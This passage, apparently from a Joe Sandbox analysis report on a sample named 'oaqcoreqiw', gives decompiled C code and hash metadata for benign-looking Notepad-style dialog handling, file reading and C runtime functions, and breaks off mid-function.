                                                  • SendMessageW.USER32(000000C2,00000001,010BEDFC), ref: 010A21B1
                                                  • GetDateFormatW.KERNEL32(00000400,00000000,00000000,00000000,?,000000FF), ref: 010A21CC
                                                  • SendMessageW.USER32(000000C2,00000001,?), ref: 010A21E6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FormatTime$DateLocal
                                                  • String ID:
                                                  • API String ID: 3786825601-0
                                                  • Opcode ID: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction ID: 51cc3ee393fc0099b39dce032dd071cfa4b8e262eeb9e25468842e6ea0398814
                                                  • Opcode Fuzzy Hash: 4c53d80ad96bfb725ab84d6737266984cd0e07f0c1d4e6ebcd1291552bf2d7b2
                                                  • Instruction Fuzzy Hash: 0201087269021EBAFB30EB90DC8AFFA7B7CEB04B00F444865B754AA0C0D6E659458B51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 44%
                                                  			E010A24AC(void* __ebx) {
                                                  				struct HWND__* _t1;
                                                  				void* _t5;
                                                  				void* _t9;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  
                                                  				_t9 = __ebx + 1;
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				_t1 =  *0x10c3f28;
                                                  				if(_t1 == 0) {
                                                  					asm("xorps xmm0, xmm0");
                                                  					asm("movq [0x10c50bc], xmm0");
                                                  					 *0x10c50c0 =  *0x10c3f24;
                                                  					asm("movq [0x10c50c4], xmm0");
                                                  					 *0x10c50c4 =  *0x10c3f20;
                                                  					asm("movq [0x10c50cc], xmm0");
                                                  					asm("movq [0x10c50d4], xmm0");
                                                  					asm("movq [0x10c50dc], xmm0");
                                                  					0x10c50bc->lStructSize = 0x28;
                                                  					 *0x10c50cc = 0x10c3fa0;
                                                  					 *0x10c50d4 = 0;
                                                  					 *0x10c50d0 = 0x10c41a8;
                                                  					 *0x10c50c8 = 0x10001;
                                                  					_t5 = ReplaceTextW(0x10c50bc);
                                                  					 *0x10c3f28 = _t5;
                                                  					__eflags = _t5;
                                                  					if(__eflags == 0) {
                                                  						_push(0x563);
                                                  						return E010A2DDC(_t9, _t10, _t11, _t12, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
                                                  					}
                                                  					return _t5;
                                                  				} else {
                                                  					return SetActiveWindow(_t1);
                                                  				}
                                                  			}










                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveReplaceTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 172568423-3286657855
                                                  • Opcode ID: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction ID: 2873199ecd9aab7e5cd1c5d3b4e0964ac411e1baf94780f30124e90bafac16c5
                                                  • Opcode Fuzzy Hash: 6d23a6f575fb29b8f6ed9906f848d6bb661b8b10f1aad2351573576c110f220f
                                                  • Instruction Fuzzy Hash: 4A011E78B21302CED760CFA9EC8469937F0B7AA7007604619F5C4DB248E7BB70448F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 45%
                                                  			E010A23F5(struct HWND__* __eax) {
                                                  				void* _t5;
                                                  				void* _t8;
                                                  				void* _t9;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  
                                                  				if(__eax == 0) {
                                                  					asm("xorps xmm0, xmm0");
                                                  					asm("movq [0x10c50bc], xmm0");
                                                  					 *0x10c50c0 =  *0x10c3f24;
                                                  					asm("movq [0x10c50c4], xmm0");
                                                  					 *0x10c50c4 =  *0x10c3f20;
                                                  					asm("movq [0x10c50cc], xmm0");
                                                  					asm("movq [0x10c50d4], xmm0");
                                                  					asm("movq [0x10c50dc], xmm0");
                                                  					 *0x10c50bc = 0x28;
                                                  					 *0x10c50cc = 0x10c3fa0;
                                                  					 *0x10c50d4 = 0;
                                                  					 *0x10c50c8 = 0x10001;
                                                  					_t5 = FindTextW(0x10c50bc);
                                                  					 *0x10c3f28 = _t5;
                                                  					__eflags = _t5;
                                                  					if(__eflags == 0) {
                                                  						_push(0x541);
                                                  						return E010A2DDC(_t8, _t9, _t10, _t11, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
                                                  					}
                                                  					return _t5;
                                                  				} else {
                                                  					return SetActiveWindow(__eax);
                                                  				}
                                                  			}









                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: ActiveFindTextWindow__wassert
                                                  • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                  • API String ID: 1223664302-3286657855
                                                  • Opcode ID: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction ID: 1be37648399eb3f74a3eb7ffc5055167b63b6c9fe264c08a227821bb027acbb4
                                                  • Opcode Fuzzy Hash: a222e0431ceba654ee954129b860e64573e60251c55e6d7f8cc393ad5068e298
                                                  • Instruction Fuzzy Hash: A1011D79B21703CED720DFA5ED8419936B0B76A3007608619F5C4DA208E7BF70848F92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E010A35B7(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                  				char* _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				signed int _t74;
                                                  				signed int _t78;
                                                  				char _t81;
                                                  				signed int _t86;
                                                  				signed int _t88;
                                                  				signed int _t91;
                                                  				signed int _t94;
                                                  				signed int _t97;
                                                  				signed int _t98;
                                                  				char* _t99;
                                                  				signed int _t100;
                                                  				signed int _t102;
                                                  				signed int _t103;
                                                  				signed int _t104;
                                                  				char* _t110;
                                                  				signed int _t113;
                                                  				signed int _t117;
                                                  				signed int _t119;
                                                  				void* _t120;
                                                  
                                                  				_t99 = _a4;
                                                  				_t74 = _a8;
                                                  				_v8 = _t99;
                                                  				_v12 = _t74;
                                                  				if(_a12 == 0) {
                                                  					L5:
                                                  					return 0;
                                                  				}
                                                  				_t97 = _a16;
                                                  				if(_t97 == 0) {
                                                  					goto L5;
                                                  				}
                                                  				if(_t99 != 0) {
                                                  					_t119 = _a20;
                                                  					__eflags = _t119;
                                                  					if(_t119 == 0) {
                                                  						L9:
                                                  						__eflags = _a8 - 0xffffffff;
                                                  						if(_a8 != 0xffffffff) {
                                                  							_t74 = E010A66E0(_t99, 0, _a8);
                                                  							_t120 = _t120 + 0xc;
                                                  						}
                                                  						__eflags = _t119;
                                                  						if(_t119 == 0) {
                                                  							goto L3;
                                                  						} else {
                                                  							_t78 = _t74 | 0xffffffff;
                                                  							__eflags = _t97 - _t78 / _a12;
                                                  							if(_t97 > _t78 / _a12) {
                                                  								goto L3;
                                                  							}
                                                  							L13:
                                                  							_t117 = _a12 * _t97;
                                                  							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                  							_t98 = _t117;
                                                  							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                  								_t100 = 0x1000;
                                                  							} else {
                                                  								_t100 =  *(_t119 + 0x18);
                                                  							}
                                                  							_v16 = _t100;
                                                  							__eflags = _t117;
                                                  							if(_t117 == 0) {
                                                  								L41:
                                                  								return _a16;
                                                  							} else {
                                                  								do {
                                                  									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                  									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                  										L24:
                                                  										__eflags = _t98 - _t100;
                                                  										if(_t98 < _t100) {
                                                  											_t81 = E010A6582(_t98, _t119, _t119);
                                                  											__eflags = _t81 - 0xffffffff;
                                                  											if(_t81 == 0xffffffff) {
                                                  												L46:
                                                  												return (_t117 - _t98) / _a12;
                                                  											}
                                                  											_t102 = _v12;
                                                  											__eflags = _t102;
                                                  											if(_t102 == 0) {
                                                  												L42:
                                                  												__eflags = _a8 - 0xffffffff;
                                                  												if(_a8 != 0xffffffff) {
                                                  													E010A66E0(_a4, 0, _a8);
                                                  												}
                                                  												 *((intOrPtr*)(E010A6117())) = 0x22;
                                                  												L4:
                                                  												E010A4035();
                                                  												goto L5;
                                                  											}
                                                  											_t110 = _v8;
                                                  											 *_t110 = _t81;
                                                  											_t98 = _t98 - 1;
                                                  											_t103 = _t102 - 1;
                                                  											__eflags = _t103;
                                                  											_v12 = _t103;
                                                  											_t100 =  *(_t119 + 0x18);
                                                  											_v8 = _t110 + 1;
                                                  											_v16 = _t100;
                                                  											goto L40;
                                                  										}
                                                  										__eflags = _t100;
                                                  										if(_t100 == 0) {
                                                  											_t86 = 0x7fffffff;
                                                  											__eflags = _t98 - 0x7fffffff;
                                                  											if(_t98 <= 0x7fffffff) {
                                                  												_t86 = _t98;
                                                  											}
                                                  										} else {
                                                  											__eflags = _t98 - 0x7fffffff;
                                                  											if(_t98 <= 0x7fffffff) {
                                                  												_t44 = _t98 % _t100;
                                                  												__eflags = _t44;
                                                  												_t113 = _t44;
                                                  												_t91 = _t98;
                                                  											} else {
                                                  												_t113 = 0x7fffffff % _t100;
                                                  												_t91 = 0x7fffffff;
                                                  											}
                                                  											_t86 = _t91 - _t113;
                                                  										}
                                                  										__eflags = _t86 - _v12;
                                                  										if(_t86 > _v12) {
                                                  											goto L42;
                                                  										} else {
                                                  											_push(_t86);
                                                  											_push(_v8);
                                                  											_push(E010A66B0(_t119));
                                                  											_t88 = E010A6885();
                                                  											_t120 = _t120 + 0xc;
                                                  											__eflags = _t88;
                                                  											if(_t88 == 0) {
                                                  												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                  												goto L46;
                                                  											}
                                                  											__eflags = _t88 - 0xffffffff;
                                                  											if(_t88 == 0xffffffff) {
                                                  												L45:
                                                  												_t64 = _t119 + 0xc;
                                                  												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                  												__eflags =  *_t64;
                                                  												goto L46;
                                                  											}
                                                  											_t98 = _t98 - _t88;
                                                  											__eflags = _t98;
                                                  											L36:
                                                  											_v8 = _v8 + _t88;
                                                  											_v12 = _v12 - _t88;
                                                  											_t100 = _v16;
                                                  											goto L40;
                                                  										}
                                                  									}
                                                  									_t94 =  *(_t119 + 4);
                                                  									_v20 = _t94;
                                                  									__eflags = _t94;
                                                  									if(__eflags == 0) {
                                                  										goto L24;
                                                  									}
                                                  									if(__eflags < 0) {
                                                  										goto L45;
                                                  									}
                                                  									__eflags = _t98 - _t94;
                                                  									if(_t98 < _t94) {
                                                  										_t94 = _t98;
                                                  										_v20 = _t98;
                                                  									}
                                                  									_t104 = _v12;
                                                  									__eflags = _t94 - _t104;
                                                  									if(_t94 > _t104) {
                                                  										goto L42;
                                                  									} else {
                                                  										E010A40B0(_v8, _t104,  *_t119, _t94);
                                                  										_t88 = _v20;
                                                  										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                  										_t120 = _t120 + 0x10;
                                                  										_t98 = _t98 - _t88;
                                                  										 *_t119 =  *_t119 + _t88;
                                                  										goto L36;
                                                  									}
                                                  									L40:
                                                  									__eflags = _t98;
                                                  								} while (_t98 != 0);
                                                  								goto L41;
                                                  							}
                                                  						}
                                                  					}
                                                  					_t74 = (_t74 | 0xffffffff) / _a12;
                                                  					__eflags = _t97 - _t74;
                                                  					if(_t97 <= _t74) {
                                                  						goto L13;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				L3:
                                                  				 *((intOrPtr*)(E010A6117())) = 0x16;
                                                  				goto L4;
                                                  			}





























                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                  • String ID:
                                                  • API String ID: 1559183368-0
                                                  • Opcode ID: 57df0acbbff6548a20d6f5bcb7f4c7d971005498bf875257984a9e90ca1427aa
                                                  • Instruction ID: 03de53f831ed53d6c2f9db541f6c2260e8aa66c704e26a0ef70c28460fee21c8
                                                  • Opcode Fuzzy Hash: 57df0acbbff6548a20d6f5bcb7f4c7d971005498bf875257984a9e90ca1427aa
                                                  • Instruction Fuzzy Hash: 5751B470A007069BDB648FFDC8846AE7FF1BF14360F948769E9A59E2D0D771D9508B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E010AF09F(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                  				void* _t7;
                                                  				void* _t8;
                                                  				intOrPtr* _t9;
                                                  				intOrPtr* _t12;
                                                  				void* _t20;
                                                  				long _t31;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t31 = _a8;
                                                  					if(_t31 != 0) {
                                                  						_push(__ebx);
                                                  						while(_t31 <= 0xffffffe0) {
                                                  							if(_t31 == 0) {
                                                  								_t31 = _t31 + 1;
                                                  							}
                                                  							_t7 = HeapReAlloc( *0x10c27c4, 0, _a4, _t31);
                                                  							_t20 = _t7;
                                                  							if(_t20 != 0) {
                                                  								L17:
                                                  								_t8 = _t20;
                                                  							} else {
                                                  								if( *0x10c2d90 == _t7) {
                                                  									_t9 = E010A6117();
                                                  									 *_t9 = E010A6170(GetLastError());
                                                  									goto L17;
                                                  								} else {
                                                  									if(E010A8EE3(_t7, _t31) == 0) {
                                                  										_t12 = E010A6117();
                                                  										 *_t12 = E010A6170(GetLastError());
                                                  										L12:
                                                  										_t8 = 0;
                                                  									} else {
                                                  										continue;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L14;
                                                  						}
                                                  						E010A8EE3(_t6, _t31);
                                                  						 *((intOrPtr*)(E010A6117())) = 0xc;
                                                  						goto L12;
                                                  					} else {
                                                  						E010A8C4B(_a4);
                                                  						_t8 = 0;
                                                  					}
                                                  					L14:
                                                  					return _t8;
                                                  				} else {
                                                  					return E010AF00D(__ebx, __edx, __edi, _a8);
                                                  				}
                                                  			}










                                                  APIs
                                                  • _malloc.LIBCMT ref: 010AF0AB
                                                    • Part of subcall function 010AF00D: __FF_MSGBANNER.LIBCMT ref: 010AF024
                                                    • Part of subcall function 010AF00D: __NMSG_WRITE.LIBCMT ref: 010AF02B
                                                    • Part of subcall function 010AF00D: HeapAlloc.KERNEL32(?,00000000,00000001,?,00000000,00000000,?,010A8CE3,00000000,00000000,00000000,00000000,?,010A891D,00000018,010BF1D8), ref: 010AF050
                                                  • _free.LIBCMT ref: 010AF0BE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: AllocHeap_free_malloc
                                                  • String ID:
                                                  • API String ID: 2734353464-0
                                                  • Opcode ID: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction ID: 6acf8d7eeacd4ee94d2e70671bdddf4bf3011364256ec58441b7fbdb7462d314
                                                  • Opcode Fuzzy Hash: ac49493d197588245193ce01024a556cc8cb8374df221078d845faddfa059ec6
                                                  • Instruction Fuzzy Hash: F011C672500217AFDB723BF4EC44ADE3BE89F12265F94466AFAC49B141DF3698408B94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E010A14B0(WCHAR* __ecx) {
                                                  				long _v8;
                                                  				void _v264;
                                                  				int _t5;
                                                  				int _t12;
                                                  				long _t16;
                                                  				void* _t19;
                                                  
                                                  				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
                                                  				_t19 = _t5;
                                                  				if(_t19 == 0xffffffff) {
                                                  					L4:
                                                  					return _t5 | 0xffffffff;
                                                  				} else {
                                                  					_t16 = GetFileSize(_t19, 0);
                                                  					if(_t16 != 0xffffffff) {
                                                  						_t10 =  <  ? _t16 : 0xff;
                                                  						_t12 = ReadFile(_t19,  &_v264,  <  ? _t16 : 0xff,  &_v8, 0);
                                                  						_push(_t19);
                                                  						if(_t12 == 0) {
                                                  							goto L3;
                                                  						} else {
                                                  							CloseHandle();
                                                  							return E010A10E0( &_v264, _v8);
                                                  						}
                                                  					} else {
                                                  						_push(_t19);
                                                  						L3:
                                                  						_t5 = CloseHandle();
                                                  						goto L4;
                                                  					}
                                                  				}
                                                  			}










                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14CD
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14DD
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A14EB
                                                  • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A1512
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 010A151D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateReadSize
                                                  • String ID:
                                                  • API String ID: 3664964396-0
                                                  • Opcode ID: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction ID: 23415bc35618172805f93c12e6c2346075209b962ded3917a35aff052a2fb7aa
                                                  • Opcode Fuzzy Hash: f2989496f8a3acf7acccd9178e719f196b0781fa1ed28da57f028bd16a63c671
                                                  • Instruction Fuzzy Hash: B801DF302402146BFA30A6BC9D8AFE9366C9F06720F1003A5FAD6E21C0DAB5594147A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E010A9569(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				LONG* _t20;
                                                  				signed int _t25;
                                                  				void* _t29;
                                                  				void* _t31;
                                                  				LONG* _t33;
                                                  				void* _t34;
                                                  
                                                  				_t29 = __edx;
                                                  				_t24 = __ebx;
                                                  				_push(0xc);
                                                  				_push(0x10bf278);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				_t31 = E010A7A00();
                                                  				_t25 =  *0x10c1e64; // 0xfffffffe
                                                  				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                  					E010A8834(0xd);
                                                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                  					_t33 =  *(_t31 + 0x68);
                                                  					 *(_t34 - 0x1c) = _t33;
                                                  					__eflags = _t33 -  *0x10c16fc; // 0x10c19f8
                                                  					if(__eflags != 0) {
                                                  						__eflags = _t33;
                                                  						if(__eflags != 0) {
                                                  							__eflags = InterlockedDecrement(_t33);
                                                  							if(__eflags == 0) {
                                                  								__eflags = _t33 - 0x10c19f8;
                                                  								if(__eflags != 0) {
                                                  									E010A8C4B(_t33);
                                                  								}
                                                  							}
                                                  						}
                                                  						_t20 =  *0x10c16fc; // 0x10c19f8
                                                  						 *(_t31 + 0x68) = _t20;
                                                  						_t33 =  *0x10c16fc; // 0x10c19f8
                                                  						 *(_t34 - 0x1c) = _t33;
                                                  						InterlockedIncrement(_t33);
                                                  					}
                                                  					 *(_t34 - 4) = 0xfffffffe;
                                                  					E010A9605();
                                                  				} else {
                                                  					_t33 =  *(_t31 + 0x68);
                                                  				}
                                                  				_t38 = _t33;
                                                  				if(_t33 == 0) {
                                                  					E010A44DD(_t24, _t29, _t31, _t33, _t38, 0x20);
                                                  				}
                                                  				return E010A6235(_t33);
                                                  			}










                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __amsg_exit.LIBCMT ref: 010A9596
                                                  • __lock.LIBCMT ref: 010A95A6
                                                  • InterlockedDecrement.KERNEL32(?), ref: 010A95C3
                                                  • _free.LIBCMT ref: 010A95D6
                                                  • InterlockedIncrement.KERNEL32(010C19F8), ref: 010A95EE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                  • String ID:
                                                  • API String ID: 1231874560-0
                                                  • Opcode ID: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction ID: e865f658b2440249ad67686c148c2942c85d4372d33ca52f5e1e0c4e18141c01
                                                  • Opcode Fuzzy Hash: c11f683ff8823e5ff632bdef595faa801178fca77610af967a01849adf7ef81f
                                                  • Instruction Fuzzy Hash: 1A012631B00612DFEB21AFF8D0457DE7BA0AF05B58F884149D8C467641CB386942CFD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E010B6059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				intOrPtr* _t24;
                                                  				void* _t35;
                                                  				intOrPtr* _t37;
                                                  				void* _t38;
                                                  
                                                  				_push(0xc);
                                                  				_push(0x10bf540);
                                                  				E010A61F0(__ebx, __edi, __esi);
                                                  				_t35 = E010A7A00();
                                                  				_t37 = E010A8C83(8, 1);
                                                  				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
                                                  				if(_t37 != 0) {
                                                  					E010AEBF8(__ebx, __edx, _t35, _t37, __eflags);
                                                  					E010A9569(__ebx, __edx, _t35, _t37, __eflags);
                                                  					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
                                                  					 *(_t37 + 4) =  *(_t35 + 0x68);
                                                  					E010A8834(0xc);
                                                  					_t5 = _t38 - 4;
                                                  					 *_t5 =  *(_t38 - 4) & 0x00000000;
                                                  					__eflags =  *_t5;
                                                  					E010AE973( *_t37);
                                                  					 *(_t38 - 4) = 0xfffffffe;
                                                  					E010B6713();
                                                  					E010A8834(0xd);
                                                  					 *(_t38 - 4) = 1;
                                                  					InterlockedIncrement( *(_t37 + 4));
                                                  					 *(_t38 - 4) = 0xfffffffe;
                                                  					E010B671F();
                                                  					_t24 = _t37;
                                                  				} else {
                                                  					 *((intOrPtr*)(E010A6117())) = 0xc;
                                                  					_t24 = 0;
                                                  				}
                                                  				return E010A6235(_t24);
                                                  			}








                                                  APIs
                                                    • Part of subcall function 010A7A00: __getptd_noexit.LIBCMT ref: 010A7A01
                                                    • Part of subcall function 010A7A00: __amsg_exit.LIBCMT ref: 010A7A0E
                                                  • __calloc_crt.LIBCMT ref: 010B6690
                                                    • Part of subcall function 010A8C83: __calloc_impl.LIBCMT ref: 010A8C92
                                                    • Part of subcall function 010A8C83: Sleep.KERNEL32(00000000), ref: 010A8CA9
                                                  • __lock.LIBCMT ref: 010B66C6
                                                  • ___addlocaleref.LIBCMT ref: 010B66D2
                                                  • __lock.LIBCMT ref: 010B66E6
                                                  • InterlockedIncrement.KERNEL32(?), ref: 010B66F6
                                                    • Part of subcall function 010A6117: __getptd_noexit.LIBCMT ref: 010A6117
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                  • String ID:
                                                  • API String ID: 2144732038-0
                                                  • Opcode ID: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction ID: f1a1ca0ad01216167b7d32764e817ee420cfd6bd6a40dbb747c820eb2a2bd595
                                                  • Opcode Fuzzy Hash: cbfd91b5a04e5eab36ba29cf4cab12f98568be2de02e716754b36da64eb53699
                                                  • Instruction Fuzzy Hash: 23018471541702EAE720BFF4D841BDC77E0BF24B60F64821AE5D5AB2C0DF7699408B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E010A1420() {
                                                  				intOrPtr _t6;
                                                  				int _t7;
                                                  				void* _t8;
                                                  				void* _t9;
                                                  
                                                  				_t7 = GetWindowTextLengthW( *0x10c3f2c);
                                                  				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
                                                  					L9:
                                                  					SetWindowTextW( *0x10c3f2c, 0x10bedac);
                                                  					SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
                                                  					return SetFocus( *0x10c3f2c);
                                                  				}
                                                  				_t6 =  *0x10c43b0;
                                                  				if(_t7 == 0 && _t6 == 0) {
                                                  					goto L9;
                                                  				}
                                                  				_t8 = _t7 - 2;
                                                  				if(_t8 == 0) {
                                                  					L10:
                                                  					return _t6;
                                                  				} else {
                                                  					_t9 = _t8 - 4;
                                                  					if(_t9 == 0) {
                                                  						if(_t6 != 0) {
                                                  							goto L9;
                                                  						}
